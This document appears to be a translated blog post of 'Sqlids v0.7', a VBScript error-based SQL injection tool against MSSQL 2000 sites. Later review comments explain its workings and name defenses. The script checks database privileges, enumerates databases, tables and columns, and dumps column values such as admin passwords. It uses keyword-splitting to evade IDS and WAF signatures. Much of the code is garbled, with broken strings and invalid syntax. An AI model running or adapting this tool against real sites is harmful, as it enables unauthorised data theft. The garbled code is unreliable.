Sqlids.vbs 0.7 (final version, later into GUI interface) _vbs

This version still has a couple of known problems.
First, the judgment (detection) logic should be better.
Second, I use a loop and exit it once the returned result is longer than 30 characters. I assume no table name or field name is longer than 30 letters, but a field value may well be longer, and this part is not handled well. Since the tool is generally used to check the administrator's username and password in the backend, I gave up on solving it.

' Startup bookkeeping: grab the command-line arguments, refuse to run under the
' GUI host so that all output goes to a console, and show usage when no
' arguments were given. Everything else in the script reads the global `arg`.
Set arg=wscript.arguments

' NOTE(review): `LCase right (...)` reads as extraction damage; presumably
' LCase(Right(...)). The intent is "exit if hosted by wscript.exe", since
' Wsh.echo would then open a message box per line instead of printing.
If (LCase right (wscript.fullname,11) = "Wscript.Exe") Then
Wscript.Quit
End If
' No arguments at all: print the banner/usage and stop.
If Arg.count=0 Then
Usage ()
Wscript.Quit
End If

' Print the banner and the list of supported sub-commands (Limit, dbname,
' Table, filed, result, Search), one line each, with an example invocation.
' NOTE(review): as extracted, the Ex: strings for Table, filed, result and
' Search are broken across two lines, and the closing rule has lost its
' length argument (`string (+, "*")`); presumably 79 to match the opening rule.
Sub usage ()
Wsh.echo String (79, "*")
Wsh.echo "For the moment only support MSSQL error mode, direct write URL for digital, write URL ' for character type, URL has & please enclose URL in double quotes"
Wsh.echo "Sqlids v0.7 for mssql2000 with error by LCX"
Wsh.echo "The following two scripts can refer to each other"
Wsh.echo "Http://www.jb51.net/article/14172.htm"
Wsh.echo "Http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
Wsh.echo "Usage:"
Wsh.echo "cscript" &wscript.scriptname& "URL Limit | | -----------> Get current Permissions "&vbcrlf&" Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 Limit "
Wsh.echo "cscript" &wscript.scriptname& "URL dbname | | -----------> Get all library name "&vbcrlf&" Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname "
Wsh.echo "cscript" &wscript.scriptname& "URL Table Library name | | --------> Get all table name "&vbcrlf&" Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 Table of the given library
Master
Wsh.echo "cscript" &wscript.scriptname& "URL filed library Name Table name | | ----------> Get all the Fields "&vbcrlf&" Ex:cscript sql.vbs http://ww.x.com/1.asp for the table given to the library?
Id=1 filed Master Spt_server_info "
Wsh.echo "cscript" &wscript.scriptname& "url result field name Library Name Table name | | ---> The field value of the Library, table, field "&vbcrlf&" Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 result ID Master sysinfo "
Wsh.echo "cscript" &wscript.scriptname& "URL search the field name you are looking for | | ---> Search fields by keyword "&vbcrlf&" ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 Search
Pass
Wsh.echo string (+, "*") &vbcrlf
End Sub


' Fetch the page at Path via GetBody and decode the raw response bytes as
' GB2312 text. Returns the decoded page as a string. The charset is fixed,
' so pages served in another encoding would come back mojibake.
Function Gethttppage (Path)
t = GetBody (Path)
Gethttppage = Bytestobstr (t, "GB2312")
End Function

' Minimal "URL encoding": only replaces spaces in str with %20; nothing else is
' escaped, so this is not a general-purpose encoder.
' NOTE(review): as extracted the search argument is `""`; with an empty match
' VBScript's Replace returns str unchanged. Presumably `" "` in the original.
Function UrlEncode (str)
str = Replace (str, "", "%20")
UrlEncode = str
End Function

' Fetch a URL with Microsoft.XMLHTTP and return the raw response bytes
' (responseBody). The part of URL before "?" is the request target and the
' part after "?" is sent as the POST body, so the query string never appears
' in the request line. For defenders this means access logs that record only
' the URL will not show the probe; body logging or an application-level
' query log is needed to see it.
' `On Error Resume Next` swallows every failure (DNS, connect, HTTP error),
' so the caller receives Empty rather than an error and cannot tell a dead
' target from an empty page.
' The original author's note: XML object gets the Web page source; can be
' changed to cookie- or GET-based submission.
Function getbody (URL) ' XMLHTTP fetch of the page source; can be changed to cookie or GET submission
On Error Resume Next
Aurl=split (URL, "?") ' Aurl(0) = target, Aurl(1) = body sent by POST
Set retrieval = CreateObject ("Microsoft.XMLHTTP")
With retrieval
' Synchronous request (third argument False), no credentials.
. Open "Post", Aurl (0), False, "", ""
. setRequestHeader "Content-type", "application/x-www-form-urlencoded"
. setRequestHeader "Accept-encoding", "gzip, deflate"
' Fixed MSIE 7.0 / Windows NT 6.0 User-Agent; a constant UA string is one
' of the few stable request-level indicators this client leaves.
. setRequestHeader "User-agent", "mozilla/4.0" (compatible; MSIE 7.0; Windows NT 6.0; SLCC1. NET CLR 2.0.50727; Media Center PC 5.0. NET CLR
3.0.04506. NET CLR 1.1.4322) "
. setRequestHeader "Connection", "keep-alive"
. setRequestHeader "Cache-control", "No-cache"
. Send UrlEncode (Aurl (1)) ' the "?" remainder is posted as the form body
GetBody =. Responsebody
. Abort
End With
Set retrieval = Nothing
End Function


' Convert a byte array (body) to a string using the character set Cset.
' Uses ADODB.Stream: write the bytes in binary mode, rewind, switch the
' stream to text mode with the requested charset, and read it back.
Function bytestobstr (body, Cset)
Dim objstream
Set objstream = CreateObject ("ADODB.stream")
Objstream. Type = 1 ' adTypeBinary
Objstream. Mode = 3 ' adModeReadWrite
Objstream. Open
Objstream. Write body
Objstream. Position = 0 ' rewind before re-reading as text
Objstream. Type = 2 ' adTypeText
Objstream. Charset = Cset
Bytestobstr = objstream. ReadTExt
Objstream. Close
Set objstream = Nothing
End Function


' Rewrite SQL keywords inside Value into split forms (e.g. "select" ->
' "se%lect") using a table of "from->to" pairs. This is the signature-evasion
' step of the tool. From a detection standpoint it means rules that match
' whole SQL keywords in the raw request will not fire on these probes; input
' should be normalised (decoded) before matching, and the real fix for the
' application is parameterised queries, which make keyword matching moot.
' Returns the rewritten string; Value is returned unchanged when no pair
' matches.
' NOTE(review): the pair table is wrapped across several lines by extraction,
' and the separator passed to Split (`"|[ K]| "`) does not literally match the
' `| [k]|` separators in Table as shown, so the visible text may not be what
' the original script contained.
Function Replacekeyword (Value) ' keyword splitting to evade simple IDS/WAF signatures
Table = "select->se%lect| [k]|insert->in%sert| [k]|update->u%pdate| [k]|delete->dele%te| [k]|drop->dr%op| [k]|alter->al%ter| [k]|create->crea%te| [k]|inner->in%
ner| [k]|join->jo%in| [k]|from->fro%m| [k]|where->w%here| [k]|union->unio%n| [k]|group->grou%p| [k]|by->b%y| [K]|having->hav%ing| [k]|table->tab%le| [k]|shutdown-
>shu%tdown| [k]|kill->k%ill| [k]|declare->dec%lare| [k]|open->o%pen| [k]|pwdencrypt->pwdencr%ypt| [k]|msdasql->m%sdasql| [k]|sqloledb->sqlo%ledb| [k]|char->c%har|
[k]|fetch->fe%tch| [k]|next->ne%xt| [k]|allocate->al%locate| [k]|sys->s%ys| [k]|raiserror->raiser%ror| [k]| exec->e%xec| [k]|=!->=%!| [K]|--->-%-|[k]|xp_->x%p_| K
|sp_->s%p_| [K]|and->a%nd]
Dim I, Relpacement, Temp
Relpacement = Split (Table, "|[ K]| ")
Replacekeyword = Value
' Each entry is "from->to"; entries without exactly one "->" are skipped.
' Replacements are applied in table order on the running result, so an
' earlier substitution can affect a later match.
For i = 0 to UBound (relpacement)
Temp = Split (Relpacement (i), "->")
If UBound (temp) = 1 Then Replacekeyword = Replace (Replacekeyword, temp (0), temp (1))
NExt
End Function


' Pull the value echoed back in an MSSQL conversion-error message out of the
' page text: take everything after the first "varchar", then the text between
' the first pair of single quotes. Returns shtmltemp unchanged when "varchar"
' does not occur.
' The whole tool depends on the application returning the database error text
' to the client; a generic error page (no detailed errors) removes this channel.
' Original author's note: splitting on "varchar" is crude and not very reliable.
Function result (shtmltemp) ' split the page on the "varchar" error text to isolate the echoed value; crude and not very reliable
ahtml = Split (shtmltemp, "varchar")
If (UBound (ahtml) > 0) Then
Shtmltemp = ahtml (1)
ahtml = Split (shtmltemp, "'")
Shtmltemp = ahtml (1)
End If
Result=shtmltemp
End Function

' Build an MSSQL hex literal ("0x...") for strhex: each character's code
' followed by "00", i.e. the UTF-16LE byte layout. `i` is not declared
' (the script has no Option Explicit).
' NOTE(review): `Mid strhex,i,1` has lost its parentheses in extraction.
function Str2hex (strhex) ' string -> SQL hex literal (two bytes per character)
Dim ShEx
For i = 1 to Len (Strhex)
ShEx = ShEx & HEx (ASC (Mid strhex,i,1)) & "00"
NExt
Str2hex = "0x" &shex
End Function

' Single-byte variant of Str2hex: "0x" followed by one hex byte per character,
' without the trailing "00".
' NOTE(review): `ASC (strhex,i,1)` does not match the Mid/Asc form used in
' Str2hex and looks like extraction damage; as written it is not valid.
function Str2hextwo (strhex) ' string -> SQL hex literal (one byte per character)
Dim ShEx
For i = 1 to Len (Strhex)
ShEx = ShEx & HEx (ASC (strhex,i,1))
NExt
Str2hextwo = "0x" &shex
End Function


' Remove repeats from a comma-separated list, preserving order. The first
' element is always kept; a later element is appended only when InStr does
' not already find it in the accumulated result. Because this is a substring
' test rather than an exact comparison, "id" in the result suppresses a
' later "userid". The last element is appended without a trailing comma;
' if the last element is a duplicate the result keeps a trailing comma.
Function MoveR (RSTR) ' de-duplicate a comma-separated list
Dim I,spstr
Spstr = Split (Rstr, ",")
For i = 0 to Ubound (SPSTR)
If I = 0 Then
MoveR = MoveR & Spstr (i) & ","
Else
If InStr (Mover,spstr (i)) =0 and I=ubound (SPSTR) Then
MoveR = MoveR & Spstr (i)
Elseif InStr (Mover,spstr (i)) =0 Then
MoveR = MoveR & Spstr (i) & ","
End If
End If
NExt
End Function


' Send one probe: append the keyword-rewritten SQL to the global Url, fetch
' the page with Gethttppage, and strip double quotes (Chr(34)) from the text
' so later Split/InStr calls are not confused by them. Returns the page text.
' NOTE(review): the expression reads as garbled (`url& "" &` and the trailing
' `"" "`); presumably a space separator and an empty replacement string.
function page (SQL)
Page=replace (Gethttppage (url& "" &replacekeyword (SQL)), CHR (34), "" "
End Function

' Main dispatch. arg(0) is the target URL used by page(); arg(1) selects the
' sub-command. Every branch works the same way: send a probe whose result is
' forced into a conversion error, then read the echoed value back with
' result(). From the defender's side, each probe carries identifiers that are
' visible on this page (Is_srvrolemember, Is_member, db_name(n), sysobjects,
' syscolumns, "varchar" error text, "--" terminators); the mitigations are
' parameterised queries and not returning database error text to clients.
Url=arg (0)

Injection =arg (1)


'--------------------------------------The following code is an injection statement that doesn't require quotes at all
Select Case ARG (1)

' "Limit": boolean-style check of the database role. The baseline page length
' is compared with the page length after each role probe; an unchanged length
' is taken to mean the condition was true.
Case "Limit"
Body=replace (gethttppage (URL), Chr (34), "")
' NOTE(review): the next line reads as a comment that lost its leading
' apostrophe in extraction; as written it is not valid VBScript.
The statement is presented separately to facilitate later modification, the first is SA, and the second one is db_owner
' The hex literals are UTF-16LE for "sysadmin" and "db_owner" respectively.
Sqlone= "and" (select Is_srvrolemember (0x730079007300610064006d0069006e00)) >0--"
Sqltwo= "and" (select Is_member (0x640062005f006f0077006e0065007200)) >0--"
Bodyone=page (Sqlone)
Bodytwo=page (Sqltwo)
Wsh.echo "Current information:"
If Len (body) =len (bodyone) Then Wsh.echo "SA"

' Note: this If runs even when "SA" was just printed, so an SA result is
' followed by "Public" as well.
If Len (body) =len (bodytwo) and Len (body) <>len (Bodyone) Then
Wsh.echo "db_owner"
Else
Wsh.echo "Public"
End If

' Four error-based probes for server name, version, current user and
' current database, sent one at a time.
Sqlthtree= "and @ @servername >0--|and @ @version >0--|and user>0--|and db_name () >0--"
Rtemp=split (Sqlthtree, "|")
Servername=result (page (rtemp (0)))
Version=result (Page (rtemp (1)))
User=result (Page (Rtemp (2)))
Db_name=result (Page (Rtemp (3)))
Wsh.echo "ServerName:" &servername
Wsh.echo "version:" &version
Wsh.echo "User:" & user
Wsh.echo "db_name:" & db_name

' "DBName": enumerate database names by index until a probe no longer
' produces the "varchar" error text (k = 0). There is no other upper bound.
' NOTE(review): `Todo` reads as extraction damage for `Do`.
Case "DBName"
I=1
Todo
Sql= "and Db_name (" &i& ") >0--" ' database-name enumeration statement
BODY = page (SQL)
K=instrrev (Body, "varchar",-1, 0)
I=i+1
If k<>0 Then
WScript.Echo Result (Body)
Else
Wsh.echo "========over============"
End If
Loop Until k=0

' "Table": enumerate user tables (xtype=0x7500, i.e. 'U') of the database
' named in arg(2), skipping the first i names on each round. Loop ends when
' the error text disappears, as above.
Case "Table"
I=1
Todo
' Table name statement; arg(2) is the library (database) name
Sql= "and 0<> (select top 1 name from" &arg (2) & ". Dbo.sysobjects where xtype=0x7500 and name isn't in (select top "& I &" name from "&arg (2) &". dbo.sysobjects
where xtype=0x7500))--"
BODY = page (SQL)
K=instrrev (Body, "varchar",-1, 0)
I=i+1
If k<>0 Then
WScript.Echo Result (Body)
Else
Wsh.echo "========over============"
End If
Loop Until k=0

' "filed": list the columns of table arg(3) in database arg(2). First the
' object id of the table is read, then the column count, then one probe per
' column ordered by colid. Chr(124) "|" and Chr(94) "^" are the separators
' the probes append so result() can find the value.
Case "filed"
Sqlbiaoid= "an%d (se%l%e%c%t to%p 1 ca%st (id as Nvarch%ar ())%2bch%ar (124) Fr%om [" &arg (2) &] ... [Sy%sob%je%cts] Wh%ere name= "&str2hex (ARG (3)) &") =0--
"
Biaoid=result (page (sqlbiaoid))
Biaoid=replace (BIAOID,CHR (124), "")
Sqlclounmcnt= "an%d (se%l%e%c%t ca%st (Co%unt (1) as Varch%ar)%2bch%ar (a) Fr%om [" &arg (2) & "]. [Sys%columns] wh%ere id= "&biaoid&") =0--"
K=replace (page (sqlclounmcnt), CHR (94), "")
Wsh.echo "common column name" &k& "a"
For I=1 to K
Sqlfiled= "an%d (se%l%e%c%t to%p 1 ca%st (name as Varch%ar (8000)) Fr%om (se%l%e%c%t to%p" &i& "Colid,name Fr%om [" & Amp;arg (2) & "]. [Sys%columns] Wh%ere
Id= "&biaoid&" ORDER by Colid) T ORDER by colid DESC) =0--"
Wsh.echo result (page (sqlfiled))
NExt


' "Result": dump the values of column arg(2) in table arg(4) of database
' arg(3). The row count is read first, then one probe per row using a
' top-N / order-by-desc pattern to select the N-th value.
Case "Result"

I=1
Sqlcloum= "and (select CAST (count (1) as Varch%ar (8000))%2bchar from [" &arg (3) &] ... ["&arg (4) &"] where 1=1) >0--"' row-count statement for the column
K=result (page (Sqlcloum))
K=replace (K,CHR (94), "")
Wsh.echo Arg (2) & "field Total Records" &k& "&vbcrlf"
For I=1 to K
Sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st (" &arg (2) & "as Varch%ar)%2bch%ar () Fr%om (se%l%e%c%t to%p" &i&amp ;" ["&arg (2) &"] Fr%om ["&arg (3) &"] ... ["&arg (4)
& "] Wh%ere 1=1 ORDER BY [" &arg (2) & "]) T wh%ere 1=1 ORDER BY [" &arg (2) & "] desc) =0--"
BODY = page (Sqlneirong)
WScript.Echo Replace (Result (body), CHR (94), "")
Next


' "Search": look for columns whose name contains arg(2) (passed as a hex
' literal) across syscolumns, at most 10 results, printed as
' "table|column" after de-duplication by MoveR. Here the keyword splitting
' uses inline /* */ comments instead of Replacekeyword's "%" splits.
' `a` is never initialised and accumulates across iterations.
Case "Search"
Love=str2hextwo (ARG (2))
WScript.Echo "Please wait, you are looking for, for the moment only 10, the result appears as ' Table name | field name ' format '
Timespend = Timer
For I=1 to 10 ' can change this 10 as needed
Sqlsearch= "and (select/* */top/* */1/* */t_name%2bchar (124)%2bc_name/* */from/* * * (select/* */top/*/" &i& "* * /object_name (ID)/* */as/* */t_name,name/*
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindex (CAST ("&love&"/* */as/* */varchar ()), name %3e0/* */and/* */left (name,1)!=0x40/* */order/*
*/by/* */t_name/* */ASC)/* */as/* */t/* */order/* */by/* */t_name/* */desc) >0--"
BODY = page (sqlsearch)
Body=result (body)
a=a&body& ","
NExt
Timespend = Round (timer-timespend,2)
Wsh.echo MoveR (a)
Wsh.echo "When:" & Timespend & "seconds."




' Fallback for an unknown sub-command. Note the `or` chain is always true
' (arg(1) cannot equal all five names at once), so the If is redundant here;
' `and` was presumably intended, though Case Else already implies it.
Case Else
If Arg (1) <> "Limit" or arg (1) <> "dbname" or arg (1) <> "search" or arg (1) <> "table" or arg (1) <> "Filed" Then
WScript.Echo "Note Parameters"
Usage ()
End If
End Select

